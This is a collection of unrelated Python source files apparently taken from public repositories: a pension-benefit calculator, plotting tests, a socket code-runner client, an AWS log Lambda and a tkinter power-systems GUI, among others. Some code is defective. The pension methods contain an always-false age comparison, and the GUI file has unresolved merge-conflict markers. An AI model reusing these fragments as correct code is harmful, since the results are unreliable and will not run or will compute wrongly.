self.prb_s2[index] = self.prb_s2[index-1]*(1+self.rules.cola(year+index))
def gBenefit(self,year):
"""
Retourne le montant de la prestation du régime de base pour une année donnée.
Parameters
__________
year : int
année de la prestation
Return
______
float
Prestation.
"""
if self.claimage :
claimyear = self.gYear(self.claimage)
return self.benefit * self.rules.gIndexation(claimyear,year)
else :
return self.benefit
def gBenefit_s1(self,year):
"""
Retourne le montant de la prestation du régime supplémentaire 1 pour une année donnée.
Parameters
__________
year : int
année de la prestation
Return
______
float
Prestation.
"""
if self.claimage :
claimyear = self.gYear(self.claimage)
return self.benefit_s1 * self.rules.gIndexation(claimyear,year)
else :
return self.benefit_s1
def gBenefit_s2(self,year):
"""
Retourne le montant de la prestation du régime supplémentaire 2 pour une année donnée.
Parameters
__________
year : int
année de la prestation
Return
______
float
Prestation.
"""
if self.claimage :
claimyear = self.gYear(self.claimage)
return self.benefit_s2 * self.rules.gIndexation(claimyear,year)
else :
return self.benefit_s2
def gPRB(self,year):
"""
Retourne le montant de la prestion post-retraite du régime de base pour une année donnée.
Parameters
__________
year : int
année de la prestation
Return
______
float
Montant de la prestion post-retraite.
"""
if self.gAge(year)<60 :
return 0.0
elif self.gAge(year)<self.gAge(year)<=70:
return self.prb[self.gAge(year)-60]
else :
return self.prb[10]*self.rules.gIndexation(self.gYear(70),year)
def gPRB_s1(self,year):
"""
Retourne le montant de la prestion post-retraite du régime supplémentaire 1 pour une année donnée.
Parameters
__________
year : int
année de la prestation
Return
______
float
Montant de la prestion post-retraite.
"""
if self.gAge(year)<60 :
return 0.0
elif self.gAge(year)<self.gAge(year)<=70:
return self.prb_s1[self.gAge(year)-60]
else :
return self.prb_s1[10]*self.rules.gIndexation(self.gYear(70),year)
def gPRB_s2(self,year):
"""
Retourne le montant de la prestion post-retraite du régime supplémentaire 2 pour une année donnée.
Parameters
__________
year : int
année de la prestation
Return
______
float
Montant de la prestion post-retraite.
"""
if self.gAge(year)<60 :
return 0.0
elif self.gAge(year)<self.gAge(year)<=70:
return self.prb_s2[self.gAge(year)-60]
else :
return self.prb_s2[10]*self.rules.gIndexation(self.gYear(70),year)
def RunCase(self,claimage=65):
yr18 = np.max([self.gYear(18),self.rules.start])
start_age = self.gAge(yr18)
for a in range(start_age,self.retage):
if a == claimage:
self.ClaimCPP(self.gYear(claimage))
yr = self.gYear(a)
self.MakeContrib(yr,earn=self.rules.ympe(yr)*self.ratio_list[a-start_age], kids = self.kids_list[a-start_age])
if self.retage < claimage :
for a in range(self.retage,claimage):
yr = self.gYear(a)
self.MakeContrib(yr,earn=0)
if self.claimage==None: self.ClaimCPP(self.gYear(claimage))
return
def SetHistory_ratio(self,retage=60, **kwargs):
self.retage = retage
yr18 = np.max([self.gYear(18),self.rules.start])
start_age = self.gAge(yr18)
nyears = self.retage - start_age
self.ratio_list = [1]*nyears
nargs = len(kwargs)
niter=0
for key,val in kwargs.items():
temp_list= [x for x in val.values()]
for i in np.arange(niter,niter+temp_list[1]):
self.ratio_list[i] = temp_list[0]
niter += 1
return
def SetHistory_fam(self, claimage = 65, age_birth=[]):
self.age_birth = age_birth
yr18 = np.max([self.gYear(18),self.rules.start])
start_age = self.gAge(yr18)
nyears = claimage - start_age
self.kids_list = [False]*nyears
for x in range(len(age_birth)):
indice = age_birth[x] - start_age
if age_birth[x]>=start_age and age_birth[x]<= 50:
for yr in range(7):
self.kids_list[indice+yr] = True
if age_birth[x]>=start_age and age_birth[x]>50:
print("Please check age at birth")
else :
years_deduc = 7 - (start_age - age_birth[x])
for yr in range(years_deduc):
self.kids_list[yr] = True
def ResetCase(self):
"""
Réinitialise l'instance de la classe *account*.
"""
self.claimage = None
self.history = [record(yr) for yr in range(self.byear+18,self.byear+70,1)]
self.ncontrib = 0
self.ampe = 0.0
self.receiving = False
self.benefit = 0.0
|
StarcoderdataPython
|
117594
|
import asyncio
# import spec_checker.modules.fast_speedtest as fast
from spec_checker.modules.speedtest_net import Speedtest
from spec_checker.modules.utilities import truncate
# from main import speed_stage
from PyQt5.QtCore import QObject, QThread, pyqtSignal, QTimer
from asyncqt import asyncSlot
import asyncio
import pythoncom
pythoncom.CoInitialize()
speed_stage = 0
class SpeedtestRecord:
def __init__(self, download_speed=None, upload_speed=None, ping=None, date=None, time=None, client=None,
isp=None, ip=None, share=None, complete=False):
self.download_speed = download_speed
self.upload_speed = upload_speed
self.ping = ping
self.date = date
self.time = time
self.client = client
self.isp = isp
self.ip = ip
self.share = share
def __repr__(self):
return f"<SpeedtestRecord download_speed:{self.download_speed} upload_speed: {self.upload_speed} ping: {self.ping}ms>"
def __str__(self):
return f"""
Speedtest Information:
Download Speed: {self.download_speed}Mbps
Upload Speed: {self.upload_speed}Mpbs
Ping: {self.ping}ms
Date: {self.date}
Time: {self.time}
ISP: {self.isp}
IP Address: {self.ip}
Share Link: {self.share}"""
# def test(self):
# global speed_stage
# # Speedtest must be done this way outside of the module.
# servers = []
# threads = None
# s = Speedtest()
# s.get_servers(servers)
# s.get_best_server()
# change_speed_stage(1)
#
# s.download(threads=threads)
# change_speed_stage(2)
#
# s.upload(threads=threads, pre_allocate=False)
# change_speed_stage(3)
#
# s.results.share()
# results_dict = s.results.dict()
# change_speed_stage(4)
#
# # region Fill Results Object
# if not results_dict:
# self.download_speed = 0.00
# self.upload_speed = 0.00
# self.date = ""
# self.time = ""
# self.ping = ""
# self.isp = ""
# self.ip = ""
# self.share = ""
# if "download" in results_dict:
# self.download_speed = round(results_dict['download'] / 1000000, 2)
# if "upload" in results_dict:
# self.upload_speed = round(results_dict['upload'] / 1000000, 2)
# if "timestamp" in results_dict:
# timestamp_raw = results_dict['timestamp'].split("T")
# self.date = timestamp_raw[0]
# self.time = timestamp_raw[1]
# if "ping" in results_dict:
# self.ping = results_dict['ping']
# if "client" in results_dict:
# self.client = results_dict['client']
# if "isp" in self.client:
# self.isp = self.client['isp']
# if "ip" in self.client:
# self.ip = self.client['ip']
# if "share" in results_dict:
# self.share = results_dict['share']
#
# # endregion
# change_speed_stage(5)
#
|
StarcoderdataPython
|
3278015
|
# -*- coding: utf-8 -*-
import sys
import os
import tty
import termios
import threading
stdoutfd = sys.stdout.fileno()
stdinfd = sys.stdin.fileno()
old_settings = termios.tcgetattr(sys.stdin)
tty.setcbreak(stdinfd)
def rd():
return os.read(stdinfd, 1)
def wr(s):
sys.stdout.write(s)
sys.stdout.flush()
class Reader(threading.Thread):
def run(self, *arg, **kw):
while True:
c = rd()
sys.stderr.write(c)
sys.stderr.flush()
Reader().start()
wr("\x1bc")
wr("Hej")
def hexify(s):
return "".join(hex(ord(i))[2:] for i in s.encode("utf-8"))
wr("\x1bP0;0;0/%s;2/%s;4/%s\x9c" % (hexify(u"hejhop"), hexify(u"nana"), hexify(u"åä")))
wr("Tryck på en knapp")
#wr("\x1b(0\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78");
#wr("\x1b(Baaaaa");
# wr("Räksmörgås")
# wr("""\
# ********************************
# * *
# * *
# * *
# * *
# * Räksmörgås *
# ********************************
# """)
# wr("\x1b[5A\x1b[2COn the first line")
# wr("\x1b[1E\x1b[3GOn the second line")
# wr("\x1b[4;3HOn the muahahaha")
# wr("\x1b[1E\x1b[2COn the forth line")
# wr("\x1b[5;4H")
# wr("\x1b[1A\x1b[1DOn the third line")
# wr("\x1b[7;1H")
# wr("\x1b[2;2H")
|
StarcoderdataPython
|
157490
|
# 780. Reaching Points
import collections
class Solution:
# brute force: MLE
def reachingPoints(self, sx: int, sy: int, tx: int, ty: int) -> bool:
if sx > tx or sy > ty: return False
q = collections.deque([(sx, sy)])
while q:
cx, cy = q.popleft()
if cx == tx and cy == ty: return True
if cx+cy <= tx and cy <= ty:
q.append((cx+cy, cy))
if cx <= tx and cy+cx <= ty:
q.append((cx, cy+cx))
return False
def reachingPoints(self, sx: int, sy: int, tx: int, ty: int) -> bool:
while sx < tx and sy < ty:
tx, ty = tx % ty, ty % tx
return sx == tx and sy <= ty and (ty - sy) % sx == 0 or \
sy == ty and sx <= tx and (tx - sx) % sy == 0
|
StarcoderdataPython
|
49409
|
import unittest
class TestVerilogToEdif(unittest.TestCase):
pass
|
StarcoderdataPython
|
3386577
|
import json
with open('academ.geojson') as json_file:
data = json.load(json_file)
for p in data['features']:
a = (p['geometry'])
for tArray in a['coordinates']:
print(tArray)
print(type(tArray))
print(len(tArray))
print(' ')
|
StarcoderdataPython
|
1740208
|
'''
Tests of parameter_plots.py module
'''
import pytest
import os
import numpy as np
import scipy.interpolate as si
import matplotlib.image as mpimg
from ogusa import utils, parameter_plots, income
# Load in test results and parameters
CUR_PATH = os.path.abspath(os.path.dirname(__file__))
base_params = utils.safe_read_pickle(
os.path.join(CUR_PATH, 'test_io_data', 'model_params_baseline.pkl'))
def test_plot_imm_rates():
fig = parameter_plots.plot_imm_rates(
base_params, include_title=True)
assert fig
def test_plot_imm_rates_save_fig(tmpdir):
parameter_plots.plot_imm_rates(
base_params, path=tmpdir)
img = mpimg.imread(os.path.join(tmpdir, 'imm_rates_orig.png'))
assert isinstance(img, np.ndarray)
def test_plot_mort_rates():
fig = parameter_plots.plot_mort_rates(
base_params, include_title=True)
assert fig
def test_plot_mort_rates_save_fig(tmpdir):
parameter_plots.plot_mort_rates(
base_params, path=tmpdir)
img = mpimg.imread(os.path.join(tmpdir, 'mortality_rates.png'))
assert isinstance(img, np.ndarray)
def test_plot_pop_growth():
fig = parameter_plots.plot_pop_growth(
base_params, include_title=True)
assert fig
def test_plot_pop_growth_rates_save_fig(tmpdir):
parameter_plots.plot_pop_growth(
base_params, path=tmpdir)
img = mpimg.imread(os.path.join(tmpdir, 'pop_growth_rates.png'))
assert isinstance(img, np.ndarray)
def test_plot_ability_profiles():
fig = parameter_plots.plot_ability_profiles(
base_params, include_title=True)
assert fig
def test_plot_ability_profiles_save_fig(tmpdir):
parameter_plots.plot_ability_profiles(
base_params, path=tmpdir)
img = mpimg.imread(os.path.join(tmpdir, 'ability_profiles.png'))
assert isinstance(img, np.ndarray)
def test_plot_elliptical_u():
fig1 = parameter_plots.plot_elliptical_u(
base_params, include_title=True)
fig2 = parameter_plots.plot_elliptical_u(
base_params, plot_MU=False, include_title=True)
assert fig1
assert fig2
def test_plot_elliptical_u_save_fig(tmpdir):
parameter_plots.plot_elliptical_u(
base_params, path=tmpdir)
img = mpimg.imread(os.path.join(tmpdir, 'ellipse_v_CFE.png'))
assert isinstance(img, np.ndarray)
def test_plot_chi_n():
fig = parameter_plots.plot_chi_n(
base_params, include_title=True)
assert fig
def test_plot_chi_n_save_fig(tmpdir):
parameter_plots.plot_chi_n(
base_params, path=tmpdir)
img = mpimg.imread(os.path.join(tmpdir, 'chi_n_values.png'))
assert isinstance(img, np.ndarray)
@pytest.mark.parametrize(
'years_to_plot', [['SS'], [2025], [2050, 2070]],
ids=['SS', '2025', 'List of years'])
def test_plot_population(years_to_plot):
fig = parameter_plots.plot_population(
base_params, years_to_plot=years_to_plot, include_title=True)
assert fig
def test_plot_population_save_fig(tmpdir):
parameter_plots.plot_population(
base_params, path=tmpdir)
img = mpimg.imread(os.path.join(tmpdir, 'pop_distribution.png'))
assert isinstance(img, np.ndarray)
def test_plot_fert_rates():
totpers = base_params.S
min_yr = 20
max_yr = 100
fert_data = (np.array([0.0, 0.0, 0.3, 12.3, 47.1, 80.7, 105.5, 98.0,
49.3, 10.4, 0.8, 0.0, 0.0]) / 2000)
age_midp = np.array([9, 10, 12, 16, 18.5, 22, 27, 32, 37, 42, 47,
55, 56])
fert_func = si.interp1d(age_midp, fert_data, kind='cubic')
fert_rates = np.random.uniform(size=totpers)
fig = parameter_plots.plot_fert_rates(
fert_func, age_midp, totpers, min_yr, max_yr, fert_data,
fert_rates)
assert fig
def test_plot_fert_rates_save_fig(tmpdir):
totpers = base_params.S
min_yr = 20
max_yr = 100
fert_data = (np.array([0.0, 0.0, 0.3, 12.3, 47.1, 80.7, 105.5, 98.0,
49.3, 10.4, 0.8, 0.0, 0.0]) / 2000)
age_midp = np.array([9, 10, 12, 16, 18.5, 22, 27, 32, 37, 42, 47,
55, 56])
fert_func = si.interp1d(age_midp, fert_data, kind='cubic')
fert_rates = np.random.uniform(size=totpers)
parameter_plots.plot_fert_rates(
fert_func, age_midp, totpers, min_yr, max_yr, fert_data,
fert_rates, output_dir=tmpdir)
img = mpimg.imread(os.path.join(tmpdir, 'fert_rates.png'))
assert isinstance(img, np.ndarray)
def test_plot_mort_rates_data():
totpers = base_params.S - 1
min_yr = 21
max_yr = 100
age_year_all = np.arange(min_yr, max_yr)
mort_rates = base_params.rho[1:]
mort_rates_all = base_params.rho[1:]
infmort_rate = base_params.rho[0]
fig = parameter_plots.plot_mort_rates_data(
totpers, min_yr, max_yr, age_year_all, mort_rates_all,
infmort_rate, mort_rates, output_dir=None)
assert fig
def test_plot_mort_rates_data_save_fig(tmpdir):
totpers = base_params.S - 1
min_yr = 21
max_yr = 100
age_year_all = np.arange(min_yr, max_yr)
mort_rates = base_params.rho[1:]
mort_rates_all = base_params.rho[1:]
infmort_rate = base_params.rho[0]
parameter_plots.plot_mort_rates_data(
totpers, min_yr, max_yr, age_year_all, mort_rates_all,
infmort_rate, mort_rates, output_dir=tmpdir)
img = mpimg.imread(os.path.join(tmpdir, 'mort_rates.png'))
assert isinstance(img, np.ndarray)
def test_plot_omega_fixed():
E = 0
S = base_params.S
age_per_EpS = np.arange(21, S + 21)
omega_SS_orig = base_params.omega_SS
omega_SSfx = base_params.omega_SS
fig = parameter_plots.plot_omega_fixed(
age_per_EpS, omega_SS_orig, omega_SSfx, E, S)
assert fig
def test_plot_omega_fixed_save_fig(tmpdir):
E = 0
S = base_params.S
age_per_EpS = np.arange(21, S + 21)
omega_SS_orig = base_params.omega_SS
omega_SSfx = base_params.omega_SS
parameter_plots.plot_omega_fixed(
age_per_EpS, omega_SS_orig, omega_SSfx, E, S, output_dir=tmpdir)
img = mpimg.imread(os.path.join(tmpdir, 'OrigVsFixSSpop.png'))
assert isinstance(img, np.ndarray)
def test_plot_imm_fixed():
E = 0
S = base_params.S
age_per_EpS = np.arange(21, S + 21)
imm_rates_orig = base_params.imm_rates[0, :]
imm_rates_adj = base_params.imm_rates[-1, :]
fig = parameter_plots.plot_imm_fixed(
age_per_EpS, imm_rates_orig, imm_rates_adj, E, S)
assert fig
def test_plot_imm_fixed_save_fig(tmpdir):
E = 0
S = base_params.S
age_per_EpS = np.arange(21, S + 21)
imm_rates_orig = base_params.imm_rates[0, :]
imm_rates_adj = base_params.imm_rates[-1, :]
parameter_plots.plot_imm_fixed(
age_per_EpS, imm_rates_orig, imm_rates_adj, E, S,
output_dir=tmpdir)
img = mpimg.imread(os.path.join(tmpdir, 'OrigVsAdjImm.png'))
assert isinstance(img, np.ndarray)
def test_plot_population_path():
E = 0
S = base_params.S
age_per_EpS = np.arange(21, S + 21)
pop_2013_pct = base_params.omega[0, :]
omega_path_lev = base_params.omega.T
omega_SSfx = base_params.omega_SS
curr_year = base_params.start_year
fig = parameter_plots.plot_population_path(
age_per_EpS, pop_2013_pct, omega_path_lev, omega_SSfx,
curr_year, E, S)
assert fig
def test_plot_population_path_save_fig(tmpdir):
E = 0
S = base_params.S
age_per_EpS = np.arange(21, S + 21)
pop_2013_pct = base_params.omega[0, :]
omega_path_lev = base_params.omega.T
omega_SSfx = base_params.omega_SS
curr_year = base_params.start_year
parameter_plots.plot_population_path(
age_per_EpS, pop_2013_pct, omega_path_lev, omega_SSfx,
curr_year, E, S, output_dir=tmpdir)
img = mpimg.imread(os.path.join(tmpdir, 'PopDistPath.png'))
assert isinstance(img, np.ndarray)
# TODO:
# gen_3Dscatters_hist -- requires microdata df
# txfunc_graph - require micro data df
# txfunc_sse_plot
def test_plot_income_data():
ages = np.linspace(20 + 0.5, 100 - 0.5, 80)
abil_midp = np.array([0.125, 0.375, 0.6, 0.75, 0.85, 0.945, 0.995])
abil_pcts = np.array([0.25, 0.25, 0.2, 0.1, 0.1, 0.09, 0.01])
age_wgts = np.ones(80) * 1 / 80
emat = income.get_e_orig(age_wgts, abil_pcts)
fig = parameter_plots.plot_income_data(
ages, abil_midp, abil_pcts, emat)
assert fig
def test_plot_income_data_save_fig(tmpdir):
ages = np.linspace(20 + 0.5, 100 - 0.5, 80)
abil_midp = np.array([0.125, 0.375, 0.6, 0.75, 0.85, 0.945, 0.995])
abil_pcts = np.array([0.25, 0.25, 0.2, 0.1, 0.1, 0.09, 0.01])
age_wgts = np.ones(80) * 1 / 80
emat = income.get_e_orig(age_wgts, abil_pcts)
parameter_plots.plot_income_data(
ages, abil_midp, abil_pcts, emat, output_dir=tmpdir)
img1 = mpimg.imread(os.path.join(tmpdir, 'ability_3D_lev.png'))
img2 = mpimg.imread(os.path.join(tmpdir, 'ability_3D_log.png'))
img3 = mpimg.imread(os.path.join(tmpdir, 'ability_2D_log.png'))
assert isinstance(img1, np.ndarray)
assert isinstance(img2, np.ndarray)
assert isinstance(img3, np.ndarray)
|
StarcoderdataPython
|
58118
|
<filename>docker-builds/performance/codeclient.py
import os
import signal
import socket
from time import time, sleep
class CodeClient():
"""This class defines a CodeClient object
Conncects via socket to docker containers in order to compile and execute code.
Attributes:
code (str): The code that will be executed in the docker container.
flags (str): Compiler/Interpreter flags that the code will be executed with.
code_file_name (str): The name of file that the code will be written to.
log (str): The out log containing the error messages, stdout, and stderr
generated from running the given code.
time (float): The time it took for the container to spawn, run, and exit.
max_time (float): The maximum time allowed to wait for container to exit.
"""
def to_dict(self):
return vars(self)
def __init__(self, host = '', port = 4000, code = '', flags = '', inputs = []):
"""Constructor for the CodeHandler class."""
#TODO: consider logging inputs and outputs
self.host = host
self.port = port
self.code = code
self.flags = flags
self.inputs = inputs
self.compilation_log = ''
self.run_logs = []
self.log = ''
self.send_time = 0
self.recv_time = 0
self.run_time = 0
# this is slightly more than codeserver timeout time
self.max_time = 10.0
self.max_connection_attempts = 20
self.conn_wait_time = 1
self.conn_attempt = 0
self.BLOCK_SIZE = 4096
self.has_lost_data = False
def run(self):
"""Main driver function for the CodeHandler object"""
self.log = self.handle_connection()
def make_block(self,msg):
"""Creates a BLOCK_SIZE message using msg, padding it with \0 if it is too short"""
if not isinstance(msg,bytes):
msg = bytes(msg,"utf-8")
if len(msg) > self.BLOCK_SIZE:
msg = msg[:self.BLOCK_SIZE]
self.has_lost_data = True
return msg + bytes(('\0' * (self.BLOCK_SIZE-len(msg))),"utf-8")
def handle_connection(self):
"""Handles the socket connection to a docker container."""
error_msg_time_out = "Something went wrong running your code:\n" \
"It took too long to execute, so we stopped it!\n"
error_msg_conn = "Something went wrong trying to connect to our code server!\n" \
"Sorry for the inconvience, please try again later."
# Max time on all socket blocking actions
socket.setdefaulttimeout(self.max_time)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
log = ''
done = False
self.run_time = time()
while not done and self.conn_attempt < self.max_connection_attempts:
try:
sock.connect((self.host,self.port))
self.send_time = time()
#TODO: handle case if message is too big.
sock.send(self.make_block(self.flags))
sock.send(self.make_block(self.code))
sock.send(self.make_block(str(len(self.inputs))))
for input in self.inputs:
sock.send(self.make_block(input))
self.send_time = time() - self.send_time
self.recv_time = time()
self.compilation_log = sock.recv(self.BLOCK_SIZE).replace(b'\0',b'').decode("utf-8")
self.run_logs = []
for _ in self.inputs:
self.run_logs.append(sock.recv(self.BLOCK_SIZE).replace(b'\0',b'').decode("utf-8"))
log = self.compilation_log
# The CodeServer timed out first and sent blank log
## TODO: Make CodeServer send timeout message to explicitly notify the CodeClient
## that it has timed out.
if log == "":
raise socket.timeout
for i in range(len(self.inputs)):
log += "Input: " + self.inputs[i] + "\n"
log += "Output: \n" + self.run_logs[i] + "\n"
self.recv_time = time() - self.recv_time
done = True
except socket.timeout:
#in case the server times out without sending anything
log = error_msg_time_out
done = True
except ConnectionRefusedError as cae:
# Don't try to recover
log = error_msg_conn
log += str(cae)
done = False
except ConnectionError as ce:
# Try to recover
self.conn_attempt += 1
log = error_msg_conn
log += str(ce)
sleep(self.conn_wait_time)
except TimeoutError as te:
# Try to recover
self.conn_attempt += 1
log = error_msg_conn
log += str(te)
sleep(self.conn_wait_time)
except OSError as ose:
# Don't try to recover
log = error_msg_conn
log += str(ose)
done = False
except Exception as excep:
log += "Something strange occurred!\n"
log += str(excep)
done = True
self.run_time = time() - self.run_time
sock.close()
return log
|
StarcoderdataPython
|
3327127
|
<reponame>astroufsc/python-FLI
#!/usr/bin/python
"""
desc: Setup script for 'FLI' package.
auth: <NAME> (<EMAIL>)
date: 7/25/2012
notes: Install with "python setup.py install".
Requires FLI SDK and Linux Kernel Module
from http://www.flicamera.com/software/index.html
The SDK library should be built as a shared object, named 'libfli.so',
and located in a standard library path, such as /usr/local/lib
"""
import platform, os, shutil
PACKAGE_SOURCE_DIR = 'src'
PACKAGE_NAME = 'FLI'
PACKAGE_PATH = os.path.abspath(os.sep.join((PACKAGE_SOURCE_DIR,PACKAGE_NAME)))
PACKAGE_METADATA = {
'name' : PACKAGE_NAME,
'version' : 'dev',
'author' : "<NAME>",
'author_email' : "<EMAIL>",
}
if __name__ == "__main__":
from setuptools import setup, find_packages
setup(
packages = find_packages(PACKAGE_SOURCE_DIR),
package_dir = {'':PACKAGE_SOURCE_DIR},
#non-source files
package_data = {'': ['*.so', '*.dll']},
**PACKAGE_METADATA
)
|
StarcoderdataPython
|
165139
|
from resources import resource_log_group as re_log_group
from resources import resource_log_stream as re_log_stream
from resources import resource_log_event as re_log_event
from resources import resource_names as re_names
from contents import contents_json as ct
from s3 import s3_class as s3
import boto3
import load_balancer_cloud_watch_logs as lb_cw_logs
def lambda_handler(event, context):
try:
# S3 Class
s3_class = s3.S3Class(
boto3.client('s3'),
event['Records'][0]['s3']['bucket']['name'],
event['Records'][0]['s3']['object']['key']
)
group_name = '/load-balancer-pretty-logs/'
# Resource names
names = re_names.ResourceNames(
group_name,
s3_class.get_bucket_name()
)
# Log Group
log_group = re_log_group.LogGroup(
boto3.client('logs'),
names
)
# Log Stream
log_stream = re_log_stream.LogStream(
boto3.client('logs'),
names
)
# Log Event
log_event = re_log_event.LogEvent(
boto3.client('logs'),
names,
ct.ContentJson(s3_class, 'application')
)
# Register the log formatted
lb_cw_logs.LoadBalancerCloudWatchLogs([
log_group,
log_stream,
log_event
])
except Exception as e:
print("Error:", e)
return
|
StarcoderdataPython
|
3219967
|
<reponame>IINemo/isanlp_srl_framebank
import multiprocessing as mp
import numpy as np
ARG_SPECIAL_TAG = 'ARGSPECIAL'
PRED_SPECIAL_TAG = 'PREDSPECIAL'
def make_embeded_form(word):
if word:
# return word[1].encode('utf8')
return u"{}_{}".format(word[1], word[0])
else:
return word
class EmbedderMap:
def __init__(self, embeddings, X):
self.X_ = X
self.embeddings_ = embeddings
def __call__(self, i):
result = np.zeros((len(self.X_[0]),
self.embeddings_.vector_size))
for j in range(len(self.X_[0])):
word = self.X_[i][j]
tag = word[0] if word else str()
if tag == ARG_SPECIAL_TAG or tag == ARG_SPECIAL_TAG:
result[j, :] = np.ones(self.embeddings_.vector_size)
elif word and word in self.embeddings_:
result[j, :] = self.embeddings_[word]
return result
def embed(X, embeddings):
pool = mp.Pool(4)
result = pool.map(EmbedderMap(embeddings, X), X.index, 1000)
pool.close()
return np.asarray(result)
class EmbedderSingleMap:
def __init__(self, embeddings, X):
self.X_ = X
self.embeddings_ = embeddings
def __call__(self, i):
#word = make_embeded_form(self.X_[i])
word = self.X_[i]
if word in self.embeddings_:
return self.embeddings_[word]
else:
return np.zeros((self.embeddings_.vector_size,))
def embed_single(embeddings, X):
pool = mp.Pool(4)
result = pool.map(EmbedderSingleMap(embeddings, X), X.index, 1000)
pool.close()
return np.asarray(result)
|
StarcoderdataPython
|
84586
|
<reponame>mrcsantos1/pySEP
import tkinter as tk
from matplotlib.figure import Figure
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk
<<<<<<< HEAD
=======
import networkx as nx
<<<<<<< HEAD
from PIL import Image, ImageTk
>>>>>>> 61cee31 (logo adicionada)
=======
>>>>>>> c68287f (cálculo fluxo de potência)
# from .circuito import Circuito
from circuito import Circuito
from malha import Malha
class JanelaMain:
def __init__(self):
self.__janela = tk.Tk()
self.__info_basic = {
'nums': {'barras': 1,
'linhas': 1
},
'sBase': 100e6,
}
self.__text_status = tk.StringVar()
# janela
self.set_janela(janela_main=self.__janela)
# menu
self.set_menu(janela_main=self.__janela)
# toolbar
self.set_toolbar(janela_main=self.__janela)
# status bar
self.set_statusbar(janela_main=self.__janela, textvariable=self.__text_status)
# Criando os binds com os eventos de mouse
self.__janela.bind("<Enter>", self.bemvindo)
# self.__circuito = ckt.Circuito(sBase=100e6)
self.__circuito = Circuito(sBase=100e6)
self.__teste = Figure(figsize=(5, 5), dpi=100)
self.__show_logo()
self.__s_base()
## Malha de terra
self.__malha = Malha()
self.__janela.mainloop()
def __show_logo(self):
logo = tk.PhotoImage(file="images/pySEP_logo.png")
self.__label_logo = tk.Label(
master=self.__janela,
bg="light goldenrod",
image=logo,
)
self.__label_logo.photo = logo
self.__label_logo.pack(expand=True)
def set_menu(self, janela_main):
def __fechar_tudo():
self.__janela.destroy()
self.__janela.quit()
def func_teste():
print('\nmenu menu menu menu')
menu = tk.Menu(janela_main, tearoff=False, bg="dark goldenrod")
janela_main.config(menu=menu)
<<<<<<< HEAD
<<<<<<< HEAD
sub_file = tk.Menu(menu, tearoff=False)
menu.add_cascade(label="Arquivo", menu=sub_file)
sub_file.add_command(label="Novo Projeto", command=func_teste)
sub_file.add_command(label="Salvar Projeto", command=func_teste)
sub_file.add_command(label="Importar Projeto", command=func_teste)
sub_file.add_separator()
sub_edit = tk.Menu(menu, tearoff=False)
menu.add_cascade(label="Editar", menu=sub_edit)
sub_edit.add_command(label="Desfazer", command=func_teste)
<<<<<<< HEAD
def __show_grafo(self):
=======
def __grafo_add_edge(self, list_linhas):
self.__f = Figure(figsize=(5, 4), dpi=100)
self.__grafo.add_edges_from(list_linhas)
self.__grafo_pos = nx.spring_layout(self.__grafo)
a = self.__f.add_subplot()
=======
=======
## FILE
>>>>>>> da86f7d (opção menu projeto malha de terra ok)
menu_file = tk.Menu(menu, tearoff=False)
menu.add_cascade(label="Arquivo", menu=menu_file)
menu_file.add_command(label="Novo Projeto", command=func_teste)
menu_file.add_command(label="Salvar Projeto", command=func_teste)
menu_file.add_command(label="Importar Projeto", command=func_teste)
menu_file.add_command(label="Sair", command=__fechar_tudo)
menu_file.add_separator()
## EDIT
menu_edit = tk.Menu(menu, tearoff=False)
menu.add_cascade(label="Editar", menu=menu_edit)
menu_edit.add_command(label="Desfazer", command=func_teste)
menu_edit.add_separator()
## FLUXO DE POTÊNCIA
menu_calc_fluxo = tk.Menu(master=menu, tearoff=False)
menu.add_cascade(label="Fluxo de Potência", menu=menu_calc_fluxo)
menu_calc_fluxo.add_command(label="Calcular!", command=self.__calc_fluxo)
menu_calc_fluxo.add_cascade(label="Relatório Final", command=self.__calc_fluxo_relatorio)
menu_calc_fluxo.add_cascade(label="Mostrar Perdas", command=self.__calc_fluxo_perdas)
menu_calc_fluxo.add_cascade(label="Plotar Convergência da(s) Tensão(ões)",
command=self.__calc_fluxo_plot_tensao)
menu_calc_fluxo.add_cascade(label="Plotar Convergência do(s) Ângulo(os)", command=self.__calc_fluxo_plot_angulo)
menu_calc_fluxo.add_separator()
## PROJETO MALHA DE TERRA
menu_malha_terra = tk.Menu(master=menu, tearoff=False)
menu.add_cascade(label="Projeto Malha de Terra", menu=menu_malha_terra)
menu_malha_terra.add_command(label="Adicionar informações de projeto", command=self.__malha_terra_add_info)
menu_malha_terra.add_cascade(label="Realizar teste de projeto", command=self.__malha_terra_testar)
# menu_malha_terra.add_cascade(label="Mostrar Perdas", command=self.__calc_fluxo_perdas)
# menu_malha_terra.add_cascade(label="Plotar Convergência da(s) Tensão(ões)",
# command=self.__calc_fluxo_plot_tensao)
# menu_malha_terra.add_cascade(label="Plotar Convergência do(s) Ângulo(os)", command=self.__calc_fluxo_plot_angulo)
menu_malha_terra.add_separator()
# Sistemas de Proteção
menu_protecao = tk.Menu(master=menu, tearoff=False)
menu.add_cascade(label="Sistemas de Proteção", menu=menu_protecao)
menu_protecao.add_command(label="Desenhar Circuito do Sistema", command=self.__embreve)
# menu_protecao.add_cascade(label="Realizar teste de projeto", command=self.__malha_terra_testar)
# menu_malha_terra.add_cascade(label="Mostrar Perdas", command=self.__calc_fluxo_perdas)
# menu_malha_terra.add_cascade(label="Plotar Convergência da(s) Tensão(ões)",
# command=self.__calc_fluxo_plot_tensao)
# menu_malha_terra.add_cascade(label="Plotar Convergência do(s) Ângulo(os)", command=self.__calc_fluxo_plot_angulo)
menu_protecao.add_separator()
def __embreve(self):
print("Ferramenta em análise para desenvolvimento")
config_draw_prot = tk.Toplevel()
config_draw_prot.title("Ferramenta em análise para desenvolvimento")
config_draw_prot.geometry("1100x700")
config_draw_prot.wm_iconbitmap("images/logo_pySEP.ico")
config_draw_prot["bg"] = "light goldenrod"
frame_info_draw_prot = tk.LabelFrame(
master=config_draw_prot,
bg="light goldenrod",
text="Ferramenta em análise para desenvolvimento",
font=("Helvetica", 20)
)
frame_info_draw_prot.pack(fill='both', expand=True)
def __malha_terra_testar(self):
config_testar_malha = tk.Toplevel()
config_testar_malha.title("Testar projeto de malha de terra")
config_testar_malha.geometry("660x215")
config_testar_malha.wm_iconbitmap("images/logo_pySEP.ico")
config_testar_malha["bg"] = "light goldenrod"
frame_teste_malha = tk.LabelFrame(
master=config_testar_malha,
bg="light goldenrod",
text="Testar Projeto de Malha de Terra",
font=("Helvetica", 20)
)
# frame_teste_malha.pack(fill='both', expand=True)
